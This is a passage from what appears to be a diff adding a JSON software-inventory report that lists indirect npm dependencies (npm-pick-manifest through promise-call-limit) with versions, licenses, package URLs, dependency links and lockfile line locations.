"ID": "npm-pick-manifest@11.0.1", + "Name": "npm-pick-manifest", + "Identifier": { + "PURL": "pkg:npm/npm-pick-manifest@11.0.1", + "UID": "fae2dff5cf86a4ca" + }, + "Version": "11.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-install-checks@7.1.2", + "npm-normalize-package-bin@4.0.0", + "npm-package-arg@13.0.1", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 15192, + "EndLine": 15205 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-profile@12.0.0", + "Name": "npm-profile", + "Identifier": { + "PURL": "pkg:npm/npm-profile@12.0.0", + "UID": "639b52aa0e50991e" + }, + "Version": "12.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-registry-fetch@19.0.0", + "proc-log@5.0.0" + ], + "Locations": [ + { + "StartLine": 15206, + "EndLine": 15217 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-registry-fetch@19.0.0", + "Name": "npm-registry-fetch", + "Identifier": { + "PURL": "pkg:npm/npm-registry-fetch@19.0.0", + "UID": "33bb152abd704b87" + }, + "Version": "19.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/redact@3.2.2", + "jsonparse@1.3.1", + "make-fetch-happen@15.0.2", + "minipass-fetch@4.0.1", + "minipass@7.1.2", + "minizlib@3.1.0", + "npm-package-arg@13.0.1", + "proc-log@5.0.0" + ], + "Locations": [ + { + "StartLine": 15218, + "EndLine": 15235 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-run-path@4.0.1", + "Name": "npm-run-path", + "Identifier": { + "PURL": "pkg:npm/npm-run-path@4.0.1", + "UID": "4b4cac3857a656b2" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "path-key@3.1.1" + ], + "Locations": [ + { + "StartLine": 13517, + "EndLine": 13528 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm-user-validate@3.0.0", + "Name": "npm-user-validate", + "Identifier": { + "PURL": "pkg:npm/npm-user-validate@3.0.0", + "UID": "3df36bde6688be39" + }, + "Version": "3.0.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15236, + "EndLine": 15243 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npmlog@4.1.2", + "Name": "npmlog", + "Identifier": { + "PURL": "pkg:npm/npmlog@4.1.2", + "UID": "9c78309329f18462" + }, + "Version": "4.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "are-we-there-yet@1.1.7", + "console-control-strings@1.1.0", + "gauge@2.7.4", + "set-blocking@2.0.0" + ], + "Locations": [ + { + "StartLine": 17380, + "EndLine": 17392 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npmlog@6.0.2", + "Name": "npmlog", + "Identifier": { + "PURL": "pkg:npm/npmlog@6.0.2", + "UID": "de43b72f4934e7a3" + }, + "Version": "6.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "are-we-there-yet@3.0.1", + "console-control-strings@1.1.0", + "gauge@4.0.4", + "set-blocking@2.0.0" + ], + "Locations": [ + { + "StartLine": 15989, + "EndLine": 16005 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nth-check@2.1.1", + "Name": "nth-check", + "Identifier": { + "PURL": "pkg:npm/nth-check@2.1.1", + "UID": "a9bfa0f379dc49a7" + }, + "Version": "2.1.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "boolbase@1.0.0" + ], + "Locations": [ + { + "StartLine": 16006, + "EndLine": 16017 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nullthrows@1.1.1", + "Name": "nullthrows", + "Identifier": { + "PURL": "pkg:npm/nullthrows@1.1.1", + "UID": "2e584d24989e615" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16018, + "EndLine": 16023 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "number-is-nan@1.0.1", + "Name": "number-is-nan", + "Identifier": { + "PURL": "pkg:npm/number-is-nan@1.0.1", + "UID": "c204822dea562b4d" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16024, + "EndLine": 16032 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ob1@0.83.3", + "Name": "ob1", + "Identifier": { + "PURL": "pkg:npm/ob1@0.83.3", + "UID": "cd8b562972f07ad2" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6" + ], + "Locations": [ + { + "StartLine": 16033, + "EndLine": 16044 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "object-assign@4.1.1", + "Name": "object-assign", + "Identifier": { + "PURL": "pkg:npm/object-assign@4.1.1", + "UID": "17264ab0b69cb02b" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16045, + "EndLine": 16053 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "object-inspect@1.13.4", + "Name": "object-inspect", + "Identifier": { + "PURL": "pkg:npm/object-inspect@1.13.4", + "UID": "e14f24d916e863f9" + }, + "Version": "1.13.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16054, + "EndLine": 16066 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "on-finished@2.3.0", + "Name": "on-finished", + "Identifier": { + "PURL": "pkg:npm/on-finished@2.3.0", + "UID": "2054b9429d73a76d" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ee-first@1.1.1" + ], + "Locations": [ + { + "StartLine": 9282, + "EndLine": 9293 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "on-finished@2.4.1", + "Name": "on-finished", + "Identifier": { + "PURL": "pkg:npm/on-finished@2.4.1", + "UID": "c75def942e2f81b5" + }, + "Version": "2.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ee-first@1.1.1" + ], + "Locations": [ + { + "StartLine": 16152, + "EndLine": 16163 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "on-headers@1.1.0", + "Name": "on-headers", + "Identifier": { + "PURL": "pkg:npm/on-headers@1.1.0", + "UID": "b766287aa9e420f8" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16164, + "EndLine": 16173 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "once@1.4.0", + "Name": "once", + "Identifier": { + "PURL": "pkg:npm/once@1.4.0", + "UID": "3bb1402638e3975a" + }, + "Version": "1.4.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "wrappy@1.0.2" + ], + "Locations": [ + { + "StartLine": 16174, + "EndLine": 16182 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "onetime@5.1.2", + "Name": "onetime", + "Identifier": { + "PURL": "pkg:npm/onetime@5.1.2", + "UID": "a2b295130e36fd20" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mimic-fn@2.1.0" + ], + "Locations": [ + { + "StartLine": 16183, + "EndLine": 16197 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "open@6.4.0", + "Name": "open", + "Identifier": { + "PURL": "pkg:npm/open@6.4.0", + "UID": "d5daf92e6b7299fd" + }, + "Version": "6.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-wsl@1.1.0" + ], + "Locations": [ + { + "StartLine": 16198, + "EndLine": 16210 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "open@7.4.2", + "Name": "open", + "Identifier": { + "PURL": "pkg:npm/open@7.4.2", + "UID": "439614f29e6cb50c" + }, + "Version": "7.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-docker@2.2.1", + "is-wsl@2.2.0" + ], + "Locations": [ + { + "StartLine": 4654, + "EndLine": 4669 + }, + { + "StartLine": 16441, + "EndLine": 16457 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ora@5.4.1", + "Name": "ora", + "Identifier": { + "PURL": "pkg:npm/ora@5.4.1", + "UID": "f429251c7045f739" + }, + "Version": "5.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bl@4.1.0", + "chalk@4.1.2", + "cli-cursor@3.1.0", + "cli-spinners@2.9.2", + "is-interactive@1.0.0", + "is-unicode-supported@0.1.0", + "log-symbols@4.1.0", + "strip-ansi@6.0.1", + "wcwidth@1.0.1" + ], + "Locations": [ + { + "StartLine": 16229, + "EndLine": 16251 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-limit@2.3.0", + "Name": "p-limit", + "Identifier": { + "PURL": "pkg:npm/p-limit@2.3.0", + "UID": "918cfda1682adaa1" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-try@2.2.0" + ], + "Locations": [ + { + "StartLine": 3479, + "EndLine": 3493 + }, + { + "StartLine": 11974, + "EndLine": 11989 + }, + { + "StartLine": 16643, + "EndLine": 16658 + }, + { + "StartLine": 16709, + "EndLine": 16723 + }, + { + "StartLine": 18826, + "EndLine": 18840 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-limit@3.1.0", + "Name": "p-limit", + "Identifier": { + "PURL": "pkg:npm/p-limit@3.1.0", + "UID": "f283ab8f83f3f063" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yocto-queue@0.1.0" + ], + "Locations": [ + { + "StartLine": 16270, + "EndLine": 16284 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-locate@3.0.0", + "Name": "p-locate", + "Identifier": { + "PURL": "pkg:npm/p-locate@3.0.0", + "UID": "636b9adc31b6db3b" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-limit@2.3.0" + ], + "Locations": [ + { + "StartLine": 16724, + "EndLine": 16735 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-locate@4.1.0", + "Name": "p-locate", + "Identifier": { + "PURL": "pkg:npm/p-locate@4.1.0", + "UID": "6a8ae83d3fa69c0c" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-limit@2.3.0" + ], + "Locations": [ + { + "StartLine": 3494, + "EndLine": 3505 + }, + { + "StartLine": 11990, + "EndLine": 12002 + }, + { + "StartLine": 16659, + "EndLine": 16671 + }, + { + "StartLine": 18841, + "EndLine": 18852 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-locate@5.0.0", + "Name": "p-locate", + "Identifier": { + "PURL": "pkg:npm/p-locate@5.0.0", + "UID": "7313a8aad19940b0" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-limit@3.1.0" + ], + "Locations": [ + { + "StartLine": 16285, + "EndLine": 16299 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-map@4.0.0", + "Name": "p-map", + "Identifier": { + "PURL": "pkg:npm/p-map@4.0.0", + "UID": "51bef0d9d1e64057" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "aggregate-error@3.1.0" + ], + "Locations": [ + { + "StartLine": 16300, + "EndLine": 16315 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-map@7.0.3", + "Name": "p-map", + "Identifier": { + "PURL": "pkg:npm/p-map@7.0.3", + "UID": "401e13028ba72a92" + }, + "Version": "7.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15244, + "EndLine": 15254 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-try@2.2.0", + "Name": "p-try", + "Identifier": { + "PURL": "pkg:npm/p-try@2.2.0", + "UID": "212c3cd0b4327f58" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16316, + "EndLine": 16324 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "package-json-from-dist@1.0.1", + "Name": "package-json-from-dist", + "Identifier": { + "PURL": "pkg:npm/package-json-from-dist@1.0.1", + "UID": "fab7744928e239b3" + }, + "Version": "1.0.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15255, + "EndLine": 15261 + }, + { + "StartLine": 16325, + "EndLine": 16330 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pacote@21.0.3", + "Name": "pacote", + "Identifier": { + "PURL": "pkg:npm/pacote@21.0.3", + "UID": "d1d76a7ec933d234" + }, + "Version": "21.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/git@7.0.0", + "@npmcli/installed-package-contents@3.0.0", + "@npmcli/package-json@7.0.1", + "@npmcli/promise-spawn@8.0.3", + "@npmcli/run-script@10.0.0", + "cacache@20.0.1", + "fs-minipass@3.0.3", + "minipass@7.1.2", + "npm-package-arg@13.0.1", + "npm-packlist@10.0.2", + "npm-pick-manifest@11.0.1", + "npm-registry-fetch@19.0.0", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "sigstore@4.0.0", + "ssri@12.0.0", + "tar@7.5.1" + ], + "Locations": [ + { + "StartLine": 15262, + "EndLine": 15291 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "parent-module@1.0.1", + "Name": "parent-module", + "Identifier": { + "PURL": "pkg:npm/parent-module@1.0.1", + "UID": "7fc03d455f2a5af2" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "callsites@3.1.0" + ], + "Locations": [ + { + "StartLine": 16331, + "EndLine": 16342 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "parse-conflict-json@4.0.0", + "Name": "parse-conflict-json", + "Identifier": { + "PURL": "pkg:npm/parse-conflict-json@4.0.0", + "UID": "7e8e015a5b2228f" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "json-parse-even-better-errors@4.0.0", + "just-diff-apply@5.5.0", + "just-diff@6.0.2" + ], + "Locations": [ + { + "StartLine": 15292, + "EndLine": 15304 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "parse-json@5.2.0", + "Name": "parse-json", + "Identifier": { + "PURL": "pkg:npm/parse-json@5.2.0", + "UID": "22bd3ee0aa2a8eb9" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "error-ex@1.3.4", + "json-parse-even-better-errors@2.3.1", + "lines-and-columns@1.2.4" + ], + "Locations": [ + { + "StartLine": 16343, + "EndLine": 16360 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "parseurl@1.3.3", + "Name": "parseurl", + "Identifier": { + "PURL": "pkg:npm/parseurl@1.3.3", + "UID": "a527c1569080591d" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16361, + "EndLine": 16369 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-dirname@1.0.2", + "Name": "path-dirname", + "Identifier": { + "PURL": "pkg:npm/path-dirname@1.0.2", + "UID": "64e1752692558582" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16491, + "EndLine": 16496 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-exists@3.0.0", + "Name": "path-exists", + "Identifier": { + "PURL": "pkg:npm/path-exists@3.0.0", + "UID": "40b98528c00ded2b" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16736, + "EndLine": 16744 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-exists@4.0.0", + "Name": "path-exists", + "Identifier": { + "PURL": "pkg:npm/path-exists@4.0.0", + "UID": "733e691b52e25af3" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16497, + "EndLine": 16505 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-extra@1.0.3", + "Name": "path-extra", + "Identifier": { + "PURL": "pkg:npm/path-extra@1.0.3", + "UID": "a4659da8983d9733" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16506, + "EndLine": 16511 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-is-absolute@1.0.1", + "Name": "path-is-absolute", + "Identifier": { + "PURL": "pkg:npm/path-is-absolute@1.0.1", + "UID": "6e324b98e50987e" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16512, + "EndLine": 16520 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-key@3.1.1", + "Name": "path-key", + "Identifier": { + "PURL": "pkg:npm/path-key@3.1.1", + "UID": "2310cf414a8dc6d1" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15305, + "EndLine": 15314 + }, + { + "StartLine": 16521, + "EndLine": 16529 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-parse@1.0.7", + "Name": "path-parse", + "Identifier": { + "PURL": "pkg:npm/path-parse@1.0.7", + "UID": "9e117fccc15f120d" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16530, + "EndLine": 16535 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-scurry@1.11.1", + "Name": "path-scurry", + "Identifier": { + "PURL": "pkg:npm/path-scurry@1.11.1", + "UID": "56ae2c274003efa0" + }, + "Version": "1.11.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@10.4.3", + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 15097, + "EndLine": 15113 + }, + { + "StartLine": 16536, + "EndLine": 16551 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-scurry@2.0.0", + "Name": "path-scurry", + "Identifier": { + "PURL": "pkg:npm/path-scurry@2.0.0", + "UID": "92990294c3d2a764" + }, + "Version": "2.0.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@11.2.2", + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 15315, + "EndLine": 15329 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-type@4.0.0", + "Name": "path-type", + "Identifier": { + "PURL": "pkg:npm/path-type@4.0.0", + "UID": "3e4249e8e0c818db" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16558, + "EndLine": 16566 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "paths-js@0.4.11", + "Name": "paths-js", + "Identifier": { + "PURL": "pkg:npm/paths-js@0.4.11", + "UID": "d612a6bb88801491" + }, + "Version": "0.4.11", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16567, + "EndLine": 16575 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "picocolors@1.1.1", + "Name": "picocolors", + "Identifier": { + "PURL": "pkg:npm/picocolors@1.1.1", + "UID": "cf7d2b7286a113db" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16576, + "EndLine": 16581 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "picomatch@2.3.1", + "Name": "picomatch", + "Identifier": { + "PURL": "pkg:npm/picomatch@2.3.1", + "UID": "4893c2a2be9c6269" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16582, + "EndLine": 16593 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "picomatch@4.0.3", + "Name": "picomatch", + "Identifier": { + "PURL": "pkg:npm/picomatch@4.0.3", + "UID": "ebc01f786eb09b8f" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15752, + "EndLine": 15764 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pirates@4.0.7", + "Name": "pirates", + "Identifier": { + "PURL": "pkg:npm/pirates@4.0.7", + "UID": "f35f54f4dbe6b0da" + }, + "Version": "4.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16594, + "EndLine": 16602 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pkg-up@3.1.0", + "Name": "pkg-up", + "Identifier": { + "PURL": "pkg:npm/pkg-up@3.1.0", + "UID": "c5fb3f1f1bf344a1" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "find-up@3.0.0" + ], + "Locations": [ + { + "StartLine": 16672, + "EndLine": 16683 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "plist@3.1.0", + "Name": "plist", + "Identifier": { + "PURL": "pkg:npm/plist@3.1.0", + "UID": "2159ab0b66853f64" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@xmldom/xmldom@0.8.11", + "base64-js@1.5.1", + "xmlbuilder@15.1.1" + ], + "Locations": [ + { + "StartLine": 16745, + "EndLine": 16758 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "point-in-polygon@1.1.0", + "Name": "point-in-polygon", + "Identifier": { + "PURL": "pkg:npm/point-in-polygon@1.1.0", + "UID": "22feacee61dfa3ed" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16759, + "EndLine": 16764 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "possible-typed-array-names@1.1.0", + "Name": "possible-typed-array-names", + "Identifier": { + "PURL": "pkg:npm/possible-typed-array-names@1.1.0", + "UID": "8d1a55380f80c2a6" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16765, + "EndLine": 16773 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss-selector-parser@7.1.0", + "Name": "postcss-selector-parser", + "Identifier": { + "PURL": "pkg:npm/postcss-selector-parser@7.1.0", + "UID": "5253c4c80e4f262a" + }, + "Version": "7.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cssesc@3.0.0", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 15330, + "EndLine": 15341 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss-value-parser@4.2.0", + "Name": "postcss-value-parser", + "Identifier": { + "PURL": "pkg:npm/postcss-value-parser@4.2.0", + "UID": "24fbfb2de20423d6" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16774, + "EndLine": 16779 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "prebuild-install@7.1.3", + "Name": "prebuild-install", + "Identifier": { + "PURL": "pkg:npm/prebuild-install@7.1.3", + "UID": "5c73c7cda1ec2e83" + }, + "Version": "7.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "detect-libc@2.1.2", + "expand-template@2.0.3", + "github-from-package@0.0.0", + "minimist@1.2.8", + "mkdirp-classic@0.5.3", + "napi-build-utils@2.0.0", + "node-abi@3.78.0", + "pump@3.0.3", + "rc@1.2.8", + "simple-get@4.0.1", + "tar-fs@2.1.4", + "tunnel-agent@0.6.0" + ], + "Locations": [ + { + "StartLine": 16788, + "EndLine": 16813 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "prettier@3.6.2", + "Name": "prettier", + "Identifier": { + "PURL": "pkg:npm/prettier@3.6.2", + "UID": "39a9648909e0d0be" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17644, + "EndLine": 17658 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pretty-format@29.7.0", + "Name": "pretty-format", + "Identifier": { + "PURL": "pkg:npm/pretty-format@29.7.0", + "UID": "cccee948a1b3dec" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/schemas@29.6.3", + "ansi-styles@5.2.0", + "react-is@18.3.1" + ], + "Locations": [ + { + "StartLine": 16868, + "EndLine": 16881 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "proc-log@5.0.0", + "Name": "proc-log", + "Identifier": { + "PURL": "pkg:npm/proc-log@5.0.0", + "UID": "3cb31a9f93e775c1" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15342, + "EndLine": 15349 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "process@0.11.10", + "Name": "process", + "Identifier": { + "PURL": "pkg:npm/process@0.11.10", + "UID": "1a76772fb0cdfeb3" + }, + "Version": "0.11.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16894, + "EndLine": 16902 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "process-nextick-args@2.0.1", + "Name": "process-nextick-args", + "Identifier": { + "PURL": "pkg:npm/process-nextick-args@2.0.1", + "UID": "6d05a458fbddcb8" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16903, + "EndLine": 16908 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "proggy@3.0.0", + "Name": "proggy", + "Identifier": { + "PURL": "pkg:npm/proggy@3.0.0", + "UID": "8af2dd0f3e26ce33" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15350, + "EndLine": 15357 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "promise@7.3.1", + "Name": "promise", + "Identifier": { + "PURL": "pkg:npm/promise@7.3.1", + "UID": "f0053f6c4407710" + }, + "Version": "7.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "asap@2.0.6" + ], + "Locations": [ + { + "StartLine": 9199, + "EndLine": 9207 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "promise@8.3.0", + "Name": "promise", + "Identifier": { + "PURL": "pkg:npm/promise@8.3.0", + "UID": "e468091686a02ad" + }, + "Version": "8.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "asap@2.0.6" + ], + "Locations": [ + { + "StartLine": 16909, + "EndLine": 16917 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "promise-all-reject-late@1.0.1", + "Name": "promise-all-reject-late", + "Identifier": { + "PURL": "pkg:npm/promise-all-reject-late@1.0.1", + "UID": "557a52905c57abd2" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15358, + "EndLine": 15367 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "promise-call-limit@3.0.2", + "Name": "promise-call-limit", + "Identifier": { + "PURL": "pkg:npm/promise-call-limit@3.0.2", + "UID": "e877b12876882a55" + }, + "Version": "3.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15368, + "EndLine": 15377 + } + ], + 